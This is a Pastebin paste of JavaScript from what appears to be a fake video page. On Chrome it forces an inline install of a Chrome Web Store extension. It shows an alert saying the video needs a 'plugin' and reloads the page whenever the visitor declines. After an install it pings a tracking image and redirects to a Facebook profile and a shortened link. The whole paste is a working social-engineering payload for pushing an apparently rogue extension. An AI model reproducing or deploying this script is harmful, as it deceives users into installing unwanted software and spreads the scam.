Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- marjinal.kim
- <script type="text/javascript">
- navegador();
- function navegador() {
- var navegador = navigator.userAgent;
- if (navigator.userAgent.indexOf('Firefox') !=-1) {
- $("#uno").hide();
- $("#dos").show();
- } else if (navigator.userAgent.indexOf('Chrome') !=-1) {
- (function(a, b){
- var e = new Image();
- e.addEventListener('load', a, false);
- e.addEventListener('error', b, false);
- e.src = '';
- })(function(){
- $("#uno").hide();
- $("#dos").show();
- }, function(){
- });
- }
- }
- function chromex(){
- chrome.webstore.install("https://chrome.google.com/webstore/detail/kcmdgcbphnakhkjiomabjcbnpcbomlhc", function(){
- var dax = new Image();
- dax.onload = function(){
- window.location = "http://facebook.com/profile.php?id=*";
- window.location = "http://goo.gl/8aXfg2";
- }
- dax.onerror = function(){
- window.location = "http://facebook.com/profile.php?id=*";
- window.location = "http://goo.gl/8aXfg2";
- }
- dax.src="http://whos.amung.us/widget/chromene.png";
- }, function(err)
- {
- alert(" Sorry. if you dont install plugin, can not be get video.!\r\nPlease Install Plugin...");
- location.reload();
- });
- setTimeout(function(){
- uno.setAttribute("style", "width:700px;height:350px;background:#000000 url('verby/err.png') center center no-repeat;");
- setTimeout(function()
- {
- uno.setAttribute("style", "width:700px;height:350px;background:#000000 url('verby/up.gif') center center no-repeat;");
- }, 800);
- }, 1000);
- }
- </script>
Add Comment
Please, Sign In to add comment